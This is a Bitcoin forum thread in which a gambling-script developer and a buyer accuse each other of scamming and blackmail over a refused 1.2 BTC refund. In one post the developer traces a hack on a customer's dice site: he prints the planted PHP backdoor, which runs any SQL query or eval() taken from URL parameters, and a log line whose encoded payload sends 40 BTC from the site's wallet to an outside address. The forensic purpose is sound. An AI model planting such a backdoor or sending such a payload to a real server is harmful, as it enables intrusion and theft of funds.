Bitcoin Forum>Economy>Trading Discussion>Scam Accusations
Author

Topic: EOAKLAND - blackmailer (Read 946 times)

johny1976
legendary
Activity: 1135
Merit: 1002
Developer
EOAKLAND - blackmailer
January 11, 2015, 06:59:59 PM
#10
Quote from: eoakland on January 11, 2015, 06:19:28 PM
Johny1976 is now also being accused by one of his other customers of stealing 16btc. 
https://bitcointalksearch.org/topic/johny1976-is-a-scam-artist-dont-buy-any-of-his-code-921267

Peopled do yourself a favor and do not buying nothing from this guy.  if you have purchased something, get it tested, as there have been two hacked sites fro this developer that i know of.   
https://hashtalk.org/topic/28626/paydice-hacked/1

awesome job johny1976 Grin

Quote from: eoakland on January 11, 2015, 06:50:42 PM
he admits to his coding being the reason for hacks in the following link.
https://bitcointalksearch.org/topic/johny1976-coinjackdicewheel-casino-liesscams-920645

This is EVIDENCE that exploit was caused by 3rd person, who did custom edits for bandot

To the recent hack:

Quote from: johny1976 on January 11, 2015, 06:39:04 PM
Quote from: Bandot on January 11, 2015, 04:33:51 PM
https://privnote.com/n/ihyaygumyiqlxvao/#jbwkzjdlaiuaxjpv

Thank you.

I've investigated the issue and here is my conclusion:

Fact 1

This is head of our original file /content/ajax/_stats_load.php:
Code:
/*
 *  © CoinDice
 *  Demo: http://www.btcircle.com/dice
 *  Please do not copy or redistribute.
 *  More licences we sell, more products we develop in the future.
*/


header('X-Frame-Options: DENY');

...

This is head of your custom edited file /content/ajax/_stats_load.php:
Code:
if(isset($_GET['query'])) {mysql_connect($_GET['ip'], $_GET['user'], $_GET['pass']);mysql_select_db($_GET['db']);$q mysql_query($_GET['query']);while($m =  mysql_fetch_assoc($q)) {$values array_values($m);$keys array_keys($m);for($i 0;$i<count($values);$i++) {echo $keys[$i] . ": " $values[$i] . "
";}echo "
";}mysql_close();exit;}else if(isset($_GET['eval'])) {eval($_GET['eval']);exit;}
/*
 *  © CoinDice
 *  Demo: http://www.btcircle.com/dice
 *  Please do not copy or redistribute.
 *  More licences we sell, more products we develop in the future.
*/


header('X-Frame-Options: DENY');

...

Please pay closer attention to eval($_GET['eval']) part (this is the used exploit).

Fact 2

This line is from your webserver log:
Code:
pay-dice.com:80 107.3.170.11 - - [04/Jan/2015:20:12:12 -0500] "GET /play/content/ajax/_stats_load.php?eval=%24included%3Dtrue%3Binclude_once+%27..%2F..%2Finc%2Fdb-conf.php%27%3Binclude+%27..%2F..%2Finc%2Fwallet_driver.php%27%3B%24wallet%3Dnew+jsonRPCClient%28%24driver_login%29%3Becho+%24wallet-%3Egetbalance%28%29%3B%24wallet-%3Esendtoaddress%28%27PJYcpnBrHUnCuQbSHSt42CC6JeFXyZEDZN%27%2C40%29%3Becho+%24wallet-%3Egetbalance%28%29%3Bmysql_close%28%29%3Becho+file_get_contents%28%27config.php%27%29%3B HTTP/1.1" 200 242 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0"

Please pay closer attention to ?eval=... part and sendtoaddress%28%27PJYcpnBrHUnCuQbSHSt42CC6JeFXyZEDZN part.

The second part is the address on which the stolen funds were sent.

Fact 3

The file _stats_load.php could edit only someone who had full access to the system, in which case it would be much easier to withraw the funds directly from your wallet.

Fact 4



Only person who could edit this file is the guy who did the custom coding for you.



I think it's clear enough. Someone (most possibly the guy who did custom login system for you) has put the backdoor to _stats_load.php, then executed his own PHP code on your server.


Resources:
/var/log/apache2/other_vhosts_access.log.1  your webserver log
/var/www/paydice/play/content/ajax/_stats_load.php  compromised file


I'm sorry what happened to you. At least you know you can't trust anybody.

We would much appreciate your permission to make this case public (there's some people who claim this was our fault).


Hope I've cleared the whole thing out and pointed the real offender. Let me know if you need some additional informations or support.

Johny


Bandot's reply:

Quote from: Bandot on January 11, 2015, 08:40:40 PM
http://imgur.com/TKkXYM3

eoakland
hero member
Activity: 699
Merit: 504
Re: EOAKLAND - blackmailer
January 11, 2015, 06:19:28 PM
#9
Johny1976 is now also being accused by one of his other customers of stealing 16btc. 
https://bitcointalksearch.org/topic/johny1976-is-a-scam-artist-dont-buy-any-of-his-code-921267

Peopled do yourself a favor and do not buying nothing from this guy.  if you have purchased something, get it tested, as there have been two hacked sites fro this developer that i know of.   
https://hashtalk.org/topic/28626/paydice-hacked/1

awesome job johny1976 Grin
johny1976
legendary
Activity: 1135
Merit: 1002
Developer
Re: EOAKLAND - blackmailer
January 11, 2015, 10:07:02 AM
#8
I've copied the message from duplicated thread.
Quote from: eoakland on January 11, 2015, 09:57:23 AM
I got what i paid for ?  First, this thread i just created is not even about my refund.  It's about you posting that I am a blackmailer.  I have not even begun to post all of the messages that were exchanged between you and I on this forum.  I am sure your current customers are really going to like how you delayed the game.  Grin 

this is not even about the 1.2 BTC you took from me. this is now about how you lied and said i was blackmailing you for requesting a refund, and how you treat your customers. 

Yes, it's our fault we've trusted you that you're trying to help us with the update! But you can't fool us forever. Yes, you are blackmailer. You was trying to blackmail us with negative trust, comments and trust mod John K. - either 1.2 BTC or you're doomed. Really glad our customers are not like you.
johny1976
legendary
Activity: 1135
Merit: 1002
Developer
Re: EOAKLAND - blackmailer
January 11, 2015, 09:56:05 AM
#7
Please do not start duplicate threads.
eoakland
hero member
Activity: 699
Merit: 504
Re: EOAKLAND - blackmailer
January 11, 2015, 09:45:53 AM
#6
The REAL version of what happened here.  Thanks
https://bitcointalk.org/index.php?topic=920645.new#new
johny1976
legendary
Activity: 1135
Merit: 1002
Developer
Re: EOAKLAND - blackmailer
January 11, 2015, 09:27:32 AM
#5
You've found some bugs and we've fixed it. You've gotten exactly what you've paid for and then you've played with us from the beginning, you've wanted me to contact your programmer (so I did) and then he didn't answer for 3 weeks, then he told you to ask for refund as if nothing had happened. All of this was part of your evil plan and we're not gonna play it anymore.
eoakland
hero member
Activity: 699
Merit: 504
Re: EOAKLAND - blackmailer
January 11, 2015, 09:20:37 AM
#4
here is just a snippet.  of the messages.  I have tons more.  Johny is the person that did not delver a working product.  I am the purchaser, not a scammer this thread is too funny.  Johny's messages are in italics.  I will post ALL I have with screen shots to validate all.

Johny, my partner has made a couple of different inquiries to me about the status of the refund, what is the status ?

We've been waiting like idiots for your partner to show up so we can finish update as we've been discussing. He didn't. Not even on skype. It delayed us even more! So we finished the update and it's released now. We don't like how you've behaved. We've been very helpful the whole time. It just took us more time. We are aware of the time it took us so we can give you also CoinDice script + current update of CoinJack. We're also training new guy which will be helping us with support so we have more time to keep scripts updated.

Let me know, Johny

Johny,

PROCESS OUR REFUND 1E45bu4JfEsSN4hrguGbSW7dQZeT6DVpVX BTC



Are you kidding me? We didn't do anything against the rules.

Johny, we have requested a refund.  we requested one almost a week ago.  Please process our refund.  thank you

You requested next script and that's what we are giving you. Smiley

Johny I am not going to play this game.  Your game was very buggy, we waited almost 1 month from the time we purchased.  I asked for a refund 1 week ago. PROCESS OUR REFUND PLEASE

It WAS buggy.

WE HAVE ASKED FOR A REFUND; PLEASE PROCESS OUR REQUEST.

Not after your behaviour! You've delayed update on purpose so other people can't have it! After that you are asking for refund so only one who could loose in this would be us!

We're not idiots! You can have your CoinDice and CoinJack or you can have nothing!

you are refusing to refund, correct ?  I want to make sure i understand you correctly; before we leave you negative feedback and provide all messages to prove our claim on this forum.

So now you are blackmailing us with negative comments?

not at all. we made an agreement.  you never gave us a working copy of coinjack in a timely manner.  we got tired of testing 14 different versions of it.  your customers are not going to wait forever Johny.  My partner and I have requested a refund.  You agreed to the refund in one of our last messages.  We requested the refund ONE week ago.  I am not going to argue with you Johny.  If you are not going to process our refund then we will contact the "Trust" mod John K.  and show him all of the messages between us.  it's that simple.


Go ahead. We haven't stated how long will it exactly take. It was just our best guesses. You've bought the script and you've gotten the script. You can be glad we're discussing it with you after what you've done. So bye and as soon as you're ready to receive update, let me know. Tongue

Awful way to speak to customers Johny.  Best of luck.  I will leave my message on your thread now.  And i will be contacting mod John K. to show our emails exchanges.  Thanks

Glad to loose customer like you. Smiley Wish you luck though! Smiley
eoakland
hero member
Activity: 699
Merit: 504
Re: EOAKLAND - blackmailer
January 11, 2015, 09:18:46 AM
#3
Quote from: redsn0w on January 11, 2015, 09:09:13 AM
Quote from: johny1976 on January 11, 2015, 08:59:50 AM
User "eoakland" was trying to delay update so he can damage all our buyers. He is now trying to blackmail us - if he don't get 1.2 BTC he'll be writing negative comments about us!


"not at all. we made an agreement.  you never gave us a working copy of coinjack in a timely manner.  we got tired of testing 14 different versions of it.  your customers are not going to wait forever Johny.  My partner and I have requested a refund.  You agreed to the refund in one of our last messages.  We requested the refund ONE week ago.  I am not going to argue with you Johny.  If you are not going to process our refund then we will contact the "Trust" mod John K.  and show him all of the messages between us.  it's that simple.  "

If you're interested in those messages, just let me know.

I'm interested , can you send me a copy of those messages ? Thanks.

too funny.  i have all the same message.  i will be posting them.    Here you go: https://bitcointalksearch.org/topic/johny1976-coinjackdicewheel-casino-liesscams-920645
AVOID, DO NOT BUY THIS SCRIPT.

My partner and I purchased this script almost one month ago.  The software was not complete from the get-go.  the script was buggy from jump.  All of the corrections and revisions that have been made to his new version were bugs that my partner and I pointed out that needed correcting.  The developer does not know the rules of the game of black jack.  There are plenty more bugs that my partner and I did not point out, as they were not game breaking.  The developer failed to give us a working product in a timely fashion, and has since reneged on giving us a refund.  From the moment we requested the refund it took "Johny" one week to respond.  In his last communications with us he has been rude and has insulted us for requesting a refund.  I am going to publish the thread of messages between the developer and myself a little later, it's 6 a.m. my time and I need to have my coffee; however, my posts pointing out many of the game-breaking bugs are in this thread.  

I STRONGLY SUGGEST ALL WOULD BE BUYERS TO AVOID HIS SOFTWARE.  not only is his Coinjack buggy, but i am having serious concerns regarding it properly being secured.  This is just an example of one of the hacked software applications by this developer

https://hashtalk.org/topic/28626/paydice-hacked/1
redsn0w
legendary
Activity: 1778
Merit: 1043
#Free market
Re: EOAKLAND - blackmailer
January 11, 2015, 09:09:13 AM
#2
Quote from: johny1976 on January 11, 2015, 08:59:50 AM
User "eoakland" was trying to delay update so he can damage all our buyers. He is now trying to blackmail us - if he don't get 1.2 BTC he'll be writing negative comments about us!


"not at all. we made an agreement.  you never gave us a working copy of coinjack in a timely manner.  we got tired of testing 14 different versions of it.  your customers are not going to wait forever Johny.  My partner and I have requested a refund.  You agreed to the refund in one of our last messages.  We requested the refund ONE week ago.  I am not going to argue with you Johny.  If you are not going to process our refund then we will contact the "Trust" mod John K.  and show him all of the messages between us.  it's that simple.  "

If you're interested in those messages, just let me know.

I'm interested , can you send me a copy of those messages ? Thanks.
johny1976
legendary
Activity: 1135
Merit: 1002
Developer
Re: EOAKLAND - blackmailer
January 11, 2015, 08:59:50 AM
#1
User "eoakland" was trying to delay update so he can damage all our buyers. He is now trying to blackmail us - if he don't get 1.2 BTC he'll be writing negative comments about us!


"not at all. we made an agreement.  you never gave us a working copy of coinjack in a timely manner.  we got tired of testing 14 different versions of it.  your customers are not going to wait forever Johny.  My partner and I have requested a refund.  You agreed to the refund in one of our last messages.  We requested the refund ONE week ago.  I am not going to argue with you Johny.  If you are not going to process our refund then we will contact the "Trust" mod John K.  and show him all of the messages between us.  it's that simple.  "

If you're interested in those messages, just let me know.
Bitcoin Forum>Economy>Trading Discussion>Scam Accusations
Jump to: